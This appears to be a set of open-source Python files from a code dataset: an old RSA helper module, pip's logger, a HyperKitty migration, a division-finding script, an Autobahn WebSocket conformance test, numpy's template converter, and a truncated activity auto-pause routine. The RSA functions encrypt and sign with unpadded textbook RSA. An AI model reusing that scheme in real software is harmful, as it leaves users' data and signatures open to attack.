def chopstring(message, key, n, funcref):
"""Splits 'message' into chops that are at most as long as n,
converts these into integers, and calls funcref(integer, key, n)
for each chop.
Used by 'encrypt' and 'sign'.
"""
msglen = len(message)
mbits = msglen * 8
nbits = int(math.floor(math.log(n, 2)))
nbytes = nbits / 8
blocks = msglen / nbytes
if msglen % nbytes > 0:
blocks += 1
cypher = []
for bindex in range(blocks):
offset = bindex * nbytes
block = message[offset:offset+nbytes]
value = bytes2int(block)
cypher.append(funcref(value, key, n))
return picklechops(cypher)
def gluechops(chops, key, n, funcref):
"""Glues chops back together into a string. calls
funcref(integer, key, n) for each chop.
Used by 'decrypt' and 'verify'.
"""
message = ""
chops = unpicklechops(chops)
for cpart in chops:
mpart = funcref(cpart, key, n)
message += int2bytes(mpart)
return message
def encrypt(message, key):
"""Encrypts a string 'message' with the public key 'key'"""
return chopstring(message, key['e'], key['n'], encrypt_int)
def sign(message, key):
"""Signs a string 'message' with the private key 'key'"""
return chopstring(message, key['d'], key['p']*key['q'], decrypt_int)
def decrypt(cypher, key):
"""Decrypts a cypher with the private key 'key'"""
return gluechops(cypher, key['d'], key['p']*key['q'], decrypt_int)
def verify(cypher, key):
"""Verifies a cypher with the public key 'key'"""
return gluechops(cypher, key['e'], key['n'], encrypt_int)
# Do doctest if we're not imported
if __name__ == "__main__":
import doctest
doctest.testmod()
__all__ = ["gen_pubpriv_keys", "encrypt", "decrypt", "sign", "verify"]
|
mit
|
cjaffar/jaffarchiosa
|
jaffarchiosa/lib/python2.7/site-packages/pip/log.py
|
47
|
9438
|
"""Logging
"""
import sys
import os
import logging
from pip import backwardcompat
import colorama, pkg_resources
def _color_wrap(*colors):
def wrapped(inp):
return "".join(list(colors) + [inp, colorama.Style.RESET_ALL])
return wrapped
def should_color(consumer, environ, std=(sys.stdout, sys.stderr)):
real_consumer = (consumer if not isinstance(consumer, colorama.AnsiToWin32)
else consumer.wrapped)
# If consumer isn't stdout or stderr we shouldn't colorize it
if real_consumer not in std:
return False
# If consumer is a tty we should color it
if hasattr(real_consumer, "isatty") and real_consumer.isatty():
return True
# If we have an ASNI term we should color it
if environ.get("TERM") == "ANSI":
return True
# If anything else we should not color it
return False
def should_warn(current_version, removal_version):
# Our Significant digits on versions is 2, so remove everything but the
# first two places.
current_version = ".".join(current_version.split(".")[:2])
removal_version = ".".join(removal_version.split(".")[:2])
# Our warning threshold is one minor version before removal, so we
# decrement the minor version by one
major, minor = removal_version.split(".")
minor = str(int(minor) - 1)
warn_version = ".".join([major, minor])
# Test if our current_version should be a warn
return (pkg_resources.parse_version(current_version)
< pkg_resources.parse_version(warn_version))
class Logger(object):
"""
Logging object for use in command-line script. Allows ranges of
levels, to avoid some redundancy of displayed information.
"""
VERBOSE_DEBUG = logging.DEBUG - 1
DEBUG = logging.DEBUG
INFO = logging.INFO
NOTIFY = (logging.INFO + logging.WARN) / 2
WARN = WARNING = logging.WARN
ERROR = logging.ERROR
FATAL = logging.FATAL
LEVELS = [VERBOSE_DEBUG, DEBUG, INFO, NOTIFY, WARN, ERROR, FATAL]
COLORS = {
WARN: _color_wrap(colorama.Fore.YELLOW),
ERROR: _color_wrap(colorama.Fore.RED),
FATAL: _color_wrap(colorama.Fore.RED),
}
def __init__(self):
self.consumers = []
self.indent = 0
self.explicit_levels = False
self.in_progress = None
self.in_progress_hanging = False
def add_consumers(self, *consumers):
if sys.platform.startswith("win"):
for level, consumer in consumers:
if hasattr(consumer, "write"):
self.consumers.append(
(level, colorama.AnsiToWin32(consumer)),
)
else:
self.consumers.append((level, consumer))
else:
self.consumers.extend(consumers)
def debug(self, msg, *args, **kw):
self.log(self.DEBUG, msg, *args, **kw)
def info(self, msg, *args, **kw):
self.log(self.INFO, msg, *args, **kw)
def notify(self, msg, *args, **kw):
self.log(self.NOTIFY, msg, *args, **kw)
def warn(self, msg, *args, **kw):
self.log(self.WARN, msg, *args, **kw)
def error(self, msg, *args, **kw):
self.log(self.ERROR, msg, *args, **kw)
def fatal(self, msg, *args, **kw):
self.log(self.FATAL, msg, *args, **kw)
def deprecated(self, removal_version, msg, *args, **kwargs):
"""
Logs deprecation message which is log level WARN if the
``removal_version`` is > 1 minor release away and log level ERROR
otherwise.
removal_version should be the version that the deprecated feature is
expected to be removed in, so something that will not exist in
version 1.7, but will in 1.6 would have a removal_version of 1.7.
"""
from pip import __version__
if should_warn(__version__, removal_version):
self.warn(msg, *args, **kwargs)
else:
self.error(msg, *args, **kwargs)
def log(self, level, msg, *args, **kw):
if args:
if kw:
raise TypeError(
"You may give positional or keyword arguments, not both")
args = args or kw
# render
if args:
rendered = msg % args
else:
rendered = msg
rendered = ' ' * self.indent + rendered
if self.explicit_levels:
## FIXME: should this be a name, not a level number?
rendered = '%02i %s' % (level, rendered)
for consumer_level, consumer in self.consumers:
if self.level_matches(level, consumer_level):
if (self.in_progress_hanging
and consumer in (sys.stdout, sys.stderr)):
self.in_progress_hanging = False
sys.stdout.write('\n')
sys.stdout.flush()
if hasattr(consumer, 'write'):
write_content = rendered + '\n'
if should_color(consumer, os.environ):
# We are printing to stdout or stderr and it supports
# colors so render our text colored
colorizer = self.COLORS.get(level, lambda x: x)
write_content = colorizer(write_content)
consumer.write(write_content)
if hasattr(consumer, 'flush'):
consumer.flush()
else:
consumer(rendered)
def _show_progress(self):
"""Should we display download progress?"""
return (self.stdout_level_matches(self.NOTIFY) and sys.stdout.isatty())
def start_progress(self, msg):
assert not self.in_progress, (
"Tried to start_progress(%r) while in_progress %r"
% (msg, self.in_progress))
if self._show_progress():
sys.stdout.write(' ' * self.indent + msg)
sys.stdout.flush()
self.in_progress_hanging = True
else:
self.in_progress_hanging = False
self.in_progress = msg
self.last_message = None
def end_progress(self, msg='done.'):
assert self.in_progress, (
"Tried to end_progress without start_progress")
if self._show_progress():
if not self.in_progress_hanging:
# Some message has been printed out since start_progress
sys.stdout.write('...' + self.in_progress + msg + '\n')
sys.stdout.flush()
else:
# These erase any messages shown with show_progress (besides .'s)
logger.show_progress('')
logger.show_progress('')
sys.stdout.write(msg + '\n')
sys.stdout.flush()
self.in_progress = None
self.in_progress_hanging = False
def show_progress(self, message=None):
"""If we are in a progress scope, and no log messages have been
shown, write out another '.'"""
if self.in_progress_hanging:
if message is None:
sys.stdout.write('.')
sys.stdout.flush()
else:
if self.last_message:
padding = ' ' * max(0, len(self.last_message) - len(message))
else:
padding = ''
sys.stdout.write('\r%s%s%s%s' %
(' ' * self.indent, self.in_progress, message, padding))
sys.stdout.flush()
self.last_message = message
def stdout_level_matches(self, level):
"""Returns true if a message at this level will go to stdout"""
return self.level_matches(level, self._stdout_level())
def _stdout_level(self):
"""Returns the level that stdout runs at"""
for level, consumer in self.consumers:
if consumer is sys.stdout:
return level
return self.FATAL
def level_matches(self, level, consumer_level):
"""
>>> l = Logger()
>>> l.level_matches(3, 4)
False
>>> l.level_matches(3, 2)
True
>>> l.level_matches(slice(None, 3), 3)
False
>>> l.level_matches(slice(None, 3), 2)
True
>>> l.level_matches(slice(1, 3), 1)
True
>>> l.level_matches(slice(2, 3), 1)
False
"""
if isinstance(level, slice):
start, stop = level.start, level.stop
if start is not None and start > consumer_level:
return False
if stop is not None or stop <= consumer_level:
return False
return True
else:
return level >= consumer_level
@classmethod
def level_for_integer(cls, level):
levels = cls.LEVELS
if level < 0:
return levels[0]
if level >= len(levels):
return levels[-1]
return levels[level]
def move_stdout_to_stderr(self):
to_remove = []
to_add = []
for consumer_level, consumer in self.consumers:
if consumer == sys.stdout:
to_remove.append((consumer_level, consumer))
to_add.append((consumer_level, sys.stderr))
for item in to_remove:
self.consumers.remove(item)
self.consumers.extend(to_add)
logger = Logger()
|
mit
|
hyperkitty/hyperkitty
|
hyperkitty/south_migrations/0004_auto__add_index_email_in_reply_to.py
|
2
|
12212
|
# -*- coding: utf-8 -*-
# pylint: skip-file
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding index on 'Email', fields ['in_reply_to']
db.create_index(u'hyperkitty_email', ['in_reply_to'])
def backwards(self, orm):
# Removing index on 'Email', fields ['in_reply_to']
db.delete_index(u'hyperkitty_email', ['in_reply_to'])
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'hyperkitty.attachment': {
'Meta': {'unique_together': "((u'email', u'counter'),)", 'object_name': 'Attachment'},
'content': ('django.db.models.fields.BinaryField', [], {}),
'content_type': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'counter': ('django.db.models.fields.SmallIntegerField', [], {}),
'email': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'attachments'", 'to': u"orm['hyperkitty.Email']"}),
'encoding': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'size': ('django.db.models.fields.IntegerField', [], {})
},
u'hyperkitty.email': {
'Meta': {'unique_together': "((u'mailinglist', u'message_id'),)", 'object_name': 'Email'},
'archived_date': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'db_index': 'True', 'blank': 'True'}),
'content': ('django.db.models.fields.TextField', [], {}),
'date': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_reply_to': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'null': 'True', 'blank': 'True'}),
'mailinglist': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'emails'", 'to': u"orm['hyperkitty.MailingList']"}),
'message_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'message_id_hash': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'children'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['hyperkitty.Email']"}),
'sender': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'emails'", 'to': u"orm['hyperkitty.Sender']"}),
'subject': ('django.db.models.fields.CharField', [], {'max_length': "u'512'", 'db_index': 'True'}),
'thread': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'emails'", 'to': u"orm['hyperkitty.Thread']"}),
'thread_depth': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'thread_order': ('django.db.models.fields.IntegerField', [], {'default': '0', 'db_index': 'True'}),
'timezone': ('django.db.models.fields.SmallIntegerField', [], {})
},
u'hyperkitty.favorite': {
'Meta': {'object_name': 'Favorite'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'thread': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'favorites'", 'to': u"orm['hyperkitty.Thread']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'favorites'", 'to': u"orm['auth.User']"})
},
u'hyperkitty.lastview': {
'Meta': {'object_name': 'LastView'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'thread': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'lastviews'", 'to': u"orm['hyperkitty.Thread']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'lastviews'", 'to': u"orm['auth.User']"}),
'view_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'hyperkitty.mailinglist': {
'Meta': {'object_name': 'MailingList'},
'archive_policy': ('django.db.models.fields.IntegerField', [], {'default': '2'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.TextField', [], {}),
'display_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '254', 'primary_key': 'True'}),
'subject_prefix': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'hyperkitty.profile': {
'Meta': {'object_name': 'Profile'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'karma': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'timezone': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '100'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "u'hyperkitty_profile'", 'unique': 'True', 'to': u"orm['auth.User']"})
},
u'hyperkitty.sender': {
'Meta': {'object_name': 'Sender'},
'address': ('django.db.models.fields.EmailField', [], {'max_length': '255', 'primary_key': 'True'}),
'mailman_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'hyperkitty.tag': {
'Meta': {'ordering': "[u'name']", 'object_name': 'Tag'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'threads': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'tags'", 'symmetrical': 'False', 'through': u"orm['hyperkitty.Tagging']", 'to': u"orm['hyperkitty.Thread']"}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'tags'", 'symmetrical': 'False', 'through': u"orm['hyperkitty.Tagging']", 'to': u"orm['auth.User']"})
},
u'hyperkitty.tagging': {
'Meta': {'object_name': 'Tagging'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'tag': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['hyperkitty.Tag']"}),
'thread': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['hyperkitty.Thread']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
},
u'hyperkitty.thread': {
'Meta': {'unique_together': "((u'mailinglist', u'thread_id'),)", 'object_name': 'Thread'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'threads'", 'null': 'True', 'to': u"orm['hyperkitty.ThreadCategory']"}),
'date_active': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'db_index': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mailinglist': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'threads'", 'to': u"orm['hyperkitty.MailingList']"}),
'thread_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'})
},
u'hyperkitty.threadcategory': {
'Meta': {'object_name': 'ThreadCategory'},
'color': ('paintstore.fields.ColorPickerField', [], {'max_length': '7'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'})
},
u'hyperkitty.vote': {
'Meta': {'unique_together': "((u'email', u'user'),)", 'object_name': 'Vote'},
'email': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'votes'", 'to': u"orm['hyperkitty.Email']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'votes'", 'to': u"orm['auth.User']"}),
'value': ('django.db.models.fields.SmallIntegerField', [], {'db_index': 'True'})
}
}
complete_apps = ['hyperkitty']
|
gpl-3.0
|
glwu/python-for-android
|
python3-alpha/python3-src/Tools/scripts/finddiv.py
|
49
|
2498
|
#! /usr/bin/env python3
"""finddiv - a grep-like tool that looks for division operators.
Usage: finddiv [-l] file_or_directory ...
For directory arguments, all files in the directory whose name ends in
.py are processed, and subdirectories are processed recursively.
This actually tokenizes the files to avoid false hits in comments or
strings literals.
By default, this prints all lines containing a / or /= operator, in
grep -n style. With the -l option specified, it prints the filename
of files that contain at least one / or /= operator.
"""
import os
import sys
import getopt
import tokenize
def main():
try:
opts, args = getopt.getopt(sys.argv[1:], "lh")
except getopt.error as msg:
usage(msg)
return 2
if not args:
usage("at least one file argument is required")
return 2
listnames = 0
for o, a in opts:
if o == "-h":
print(__doc__)
return
if o == "-l":
listnames = 1
exit = None
for filename in args:
x = process(filename, listnames)
exit = exit or x
return exit
def usage(msg):
sys.stderr.write("%s: %s\n" % (sys.argv[0], msg))
sys.stderr.write("Usage: %s [-l] file ...\n" % sys.argv[0])
sys.stderr.write("Try `%s -h' for more information.\n" % sys.argv[0])
def process(filename, listnames):
if os.path.isdir(filename):
return processdir(filename, listnames)
try:
fp = open(filename)
except IOError as msg:
sys.stderr.write("Can't open: %s\n" % msg)
return 1
g = tokenize.generate_tokens(fp.readline)
lastrow = None
for type, token, (row, col), end, line in g:
if token in ("/", "/="):
if listnames:
print(filename)
break
if row != lastrow:
lastrow = row
print("%s:%d:%s" % (filename, row, line), end=' ')
fp.close()
def processdir(dir, listnames):
try:
names = os.listdir(dir)
except os.error as msg:
sys.stderr.write("Can't list directory: %s\n" % dir)
return 1
files = []
for name in names:
fn = os.path.join(dir, name)
if os.path.normcase(fn).endswith(".py") or os.path.isdir(fn):
files.append(fn)
files.sort(key=os.path.normcase)
exit = None
for fn in files:
x = process(fn, listnames)
exit = exit or x
return exit
if __name__ == "__main__":
sys.exit(main())
|
apache-2.0
|
crossbario/autobahn-testsuite
|
autobahntestsuite/autobahntestsuite/case/case5_2.py
|
2
|
1372
|
###############################################################################
##
## Copyright (c) Crossbar.io Technologies GmbH
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
from case import Case
class Case5_2(Case):
DESCRIPTION = """Send Pong fragmented into 2 fragments."""
EXPECTATION = """Connection is failed immediately, since control message MUST NOT be fragmented."""
def onOpen(self):
self.expected[Case.OK] = []
self.expectedClose = {"closedByMe":False,"closeCode":[self.p.CLOSE_STATUS_CODE_PROTOCOL_ERROR],"requireClean":False}
self.p.sendFrame(opcode = 10, fin = False, payload = "fragment1")
self.p.sendFrame(opcode = 0, fin = True, payload = "fragment2")
self.p.killAfter(1)
|
apache-2.0
|
Eric89GXL/numpy
|
numpy/distutils/conv_template.py
|
18
|
9732
|
#!/usr/bin/env python
"""
takes templated file .xxx.src and produces .xxx file where .xxx is
.i or .c or .h, using the following template rules
/**begin repeat -- on a line by itself marks the start of a repeated code
segment
/**end repeat**/ -- on a line by itself marks it's end
After the /**begin repeat and before the */, all the named templates are placed
these should all have the same number of replacements
Repeat blocks can be nested, with each nested block labeled with its depth,
i.e.
/**begin repeat1
*....
*/
/**end repeat1**/
When using nested loops, you can optionally exclude particular
combinations of the variables using (inside the comment portion of the inner loop):
:exclude: var1=value1, var2=value2, ...
This will exclude the pattern where var1 is value1 and var2 is value2 when
the result is being generated.
In the main body each replace will use one entry from the list of named replacements
Note that all #..# forms in a block must have the same number of
comma-separated entries.
Example:
An input file containing
/**begin repeat
* #a = 1,2,3#
* #b = 1,2,3#
*/
/**begin repeat1
* #c = ted, jim#
*/
@a@, @b@, @c@
/**end repeat1**/
/**end repeat**/
produces
line 1 "template.c.src"
/*
*********************************************************************
** This file was autogenerated from a template DO NOT EDIT!!**
** Changes should be made to the original source (.src) file **
*********************************************************************
*/
#line 9
1, 1, ted
#line 9
1, 1, jim
#line 9
2, 2, ted
#line 9
2, 2, jim
#line 9
3, 3, ted
#line 9
3, 3, jim
"""
from __future__ import division, absolute_import, print_function
__all__ = ['process_str', 'process_file']
import os
import sys
import re
from numpy.distutils.compat import get_exception
# names for replacement that are already global.
global_names = {}
# header placed at the front of head processed file
header =\
"""
/*
*****************************************************************************
** This file was autogenerated from a template DO NOT EDIT!!!! **
** Changes should be made to the original source (.src) file **
*****************************************************************************
*/
"""
# Parse string for repeat loops
def parse_structure(astr, level):
"""
The returned line number is from the beginning of the string, starting
at zero. Returns an empty list if no loops found.
"""
if level == 0 :
loopbeg = "/**begin repeat"
loopend = "/**end repeat**/"
else :
loopbeg = "/**begin repeat%d" % level
loopend = "/**end repeat%d**/" % level
ind = 0
line = 0
spanlist = []
while True:
start = astr.find(loopbeg, ind)
if start == -1:
break
start2 = astr.find("*/", start)
start2 = astr.find("\n", start2)
fini1 = astr.find(loopend, start2)
fini2 = astr.find("\n", fini1)
line += astr.count("\n", ind, start2+1)
spanlist.append((start, start2+1, fini1, fini2+1, line))
line += astr.count("\n", start2+1, fini2)
ind = fini2
spanlist.sort()
return spanlist
def paren_repl(obj):
torep = obj.group(1)
numrep = obj.group(2)
return ','.join([torep]*int(numrep))
parenrep = re.compile(r"[(]([^)]*)[)]\*(\d+)")
plainrep = re.compile(r"([^*]+)\*(\d+)")
def parse_values(astr):
# replaces all occurrences of '(a,b,c)*4' in astr
# with 'a,b,c,a,b,c,a,b,c,a,b,c'. Empty braces generate
# empty values, i.e., ()*4 yields ',,,'. The result is
# split at ',' and a list of values returned.
astr = parenrep.sub(paren_repl, astr)
# replaces occurrences of xxx*3 with xxx, xxx, xxx
astr = ','.join([plainrep.sub(paren_repl, x.strip())
for x in astr.split(',')])
return astr.split(',')
stripast = re.compile(r"\n\s*\*?")
named_re = re.compile(r"#\s*(\w*)\s*=([^#]*)#")
exclude_vars_re = re.compile(r"(\w*)=(\w*)")
exclude_re = re.compile(":exclude:")
def parse_loop_header(loophead) :
"""Find all named replacements in the header
Returns a list of dictionaries, one for each loop iteration,
where each key is a name to be substituted and the corresponding
value is the replacement string.
Also return a list of exclusions. The exclusions are dictionaries
of key value pairs. There can be more than one exclusion.
[{'var1':'value1', 'var2', 'value2'[,...]}, ...]
"""
# Strip out '\n' and leading '*', if any, in continuation lines.
# This should not effect code previous to this change as
# continuation lines were not allowed.
loophead = stripast.sub("", loophead)
# parse out the names and lists of values
names = []
reps = named_re.findall(loophead)
nsub = None
for rep in reps:
name = rep[0]
vals = parse_values(rep[1])
size = len(vals)
if nsub is None :
nsub = size
elif nsub != size :
msg = "Mismatch in number of values, %d != %d\n%s = %s"
raise ValueError(msg % (nsub, size, name, vals))
names.append((name, vals))
# Find any exclude variables
excludes = []
for obj in exclude_re.finditer(loophead):
span = obj.span()
# find next newline
endline = loophead.find('\n', span[1])
substr = loophead[span[1]:endline]
ex_names = exclude_vars_re.findall(substr)
excludes.append(dict(ex_names))
# generate list of dictionaries, one for each template iteration
dlist = []
if nsub is None :
raise ValueError("No substitution variables found")
for i in range(nsub) :
tmp = {}
for name, vals in names :
tmp[name] = vals[i]
dlist.append(tmp)
return dlist
replace_re = re.compile(r"@([\w]+)@")
def parse_string(astr, env, level, line) :
lineno = "#line %d\n" % line
# local function for string replacement, uses env
def replace(match):
name = match.group(1)
try :
val = env[name]
except KeyError:
msg = 'line %d: no definition of key "%s"'%(line, name)
raise ValueError(msg)
return val
code = [lineno]
struct = parse_structure(astr, level)
if struct :
# recurse over inner loops
oldend = 0
newlevel = level + 1
for sub in struct:
pref = astr[oldend:sub[0]]
head = astr[sub[0]:sub[1]]
text = astr[sub[1]:sub[2]]
oldend = sub[3]
newline = line + sub[4]
code.append(replace_re.sub(replace, pref))
try :
envlist = parse_loop_header(head)
except ValueError:
e = get_exception()
msg = "line %d: %s" % (newline, e)
raise ValueError(msg)
for newenv in envlist :
newenv.update(env)
newcode = parse_string(text, newenv, newlevel, newline)
code.extend(newcode)
suff = astr[oldend:]
code.append(replace_re.sub(replace, suff))
else :
# replace keys
code.append(replace_re.sub(replace, astr))
code.append('\n')
return ''.join(code)
def process_str(astr):
code = [header]
code.extend(parse_string(astr, global_names, 0, 1))
return ''.join(code)
include_src_re = re.compile(r"(\n|\A)#include\s*['\"]"
r"(?P<name>[\w\d./\\]+[.]src)['\"]", re.I)
def resolve_includes(source):
d = os.path.dirname(source)
fid = open(source)
lines = []
for line in fid:
m = include_src_re.match(line)
if m:
fn = m.group('name')
if not os.path.isabs(fn):
fn = os.path.join(d, fn)
if os.path.isfile(fn):
print('Including file', fn)
lines.extend(resolve_includes(fn))
else:
lines.append(line)
else:
lines.append(line)
fid.close()
return lines
def process_file(source):
lines = resolve_includes(source)
sourcefile = os.path.normcase(source).replace("\\", "\\\\")
try:
code = process_str(''.join(lines))
except ValueError:
e = get_exception()
raise ValueError('In "%s" loop at %s' % (sourcefile, e))
return '#line 1 "%s"\n%s' % (sourcefile, code)
def unique_key(adict):
# this obtains a unique key given a dictionary
# currently it works by appending together n of the letters of the
# current keys and increasing n until a unique key is found
# -- not particularly quick
allkeys = list(adict.keys())
done = False
n = 1
while not done:
newkey = "".join([x[:n] for x in allkeys])
if newkey in allkeys:
n += 1
else:
done = True
return newkey
def main():
try:
file = sys.argv[1]
except IndexError:
fid = sys.stdin
outfile = sys.stdout
else:
fid = open(file, 'r')
(base, ext) = os.path.splitext(file)
newname = base
outfile = open(newname, 'w')
allstr = fid.read()
try:
writestr = process_str(allstr)
except ValueError:
e = get_exception()
raise ValueError("In %s loop at %s" % (file, e))
outfile.write(writestr)
if __name__ == "__main__":
main()
|
bsd-3-clause
|
abhijit86k/tapiriik
|
tapiriik/services/auto_pause.py
|
15
|
4729
|
import itertools
from collections import defaultdict
from tapiriik.services.interchange import WaypointType
def pairwise(gen):
x, y = itertools.tee(gen)
next(y, None)
return zip(x, y)
class AutoPauseCalculator:
@classmethod
def calculate(cls, waypoints, target_duration):
if not waypoints:
yield from ()
if type(target_duration) not in [float, int]:
target_duration = target_duration.total_seconds()
# First, get a list of the inter-waypoint durations and distance deltas
inter_wp_times = []
inter_wp_distances_with_times = [] # Not in any real units
delta_t_frequencies = defaultdict(int)
for wp_a, wp_b in pairwise(waypoints):
delta_t = (wp_b.Timestamp - wp_a.Timestamp).total_seconds()
delta_t_frequencies[round(delta_t)] += 1
inter_wp_times.append(delta_t)
if wp_a.Location and wp_b.Location and wp_a.Location.Latitude is not None and wp_b.Location.Latitude is not None:
inter_wp_distances_with_times.append(((wp_a.Location.Latitude - wp_b.Location.Latitude) ** 2 + (wp_a.Location.Longitude - wp_b.Location.Longitude) ** 2, delta_t))
inter_wp_times.sort(reverse=True)
inter_wp_distances_with_times.sort(key=lambda x: x[0])
# Guesstimate what the sampling rate is
delta_t_mode = sorted(delta_t_frequencies.items(), key=lambda x: x[1])[-1][0]
# ...should sum to the elapsed duration, so we'll cheat
elapsed_duration = (waypoints[-1].Timestamp - waypoints[0].Timestamp).total_seconds()
# Then, walk through our list until we recover enough time - call this the auto-pause threshold for time
# This is an attempt to discover times when they paused the activity (missing data for a significant period of time)
recovered_duration = 0
auto_pause_time_threshold = None
inter_times_iter = iter(inter_wp_times)
try:
while elapsed_duration - recovered_duration > target_duration:
new_thresh = next(inter_times_iter)
# Bail out before we enter the zone of pausing the entire activity
if new_thresh <= delta_t_mode * 2:
break
auto_pause_time_threshold = new_thresh
recovered_duration += auto_pause_time_threshold
except StopIteration:
pass
# And the same for distances, if we didn't find enough time via the inter-waypoint time method
# This is the traditional "auto-pause" where, if the user is stationary the activity is paused
# So, we look for points where they were moving the least and pause during them
auto_pause_dist_threshold = None
inter_dist_iter = iter(inter_wp_distances_with_times)
try:
while elapsed_duration - recovered_duration > target_duration:
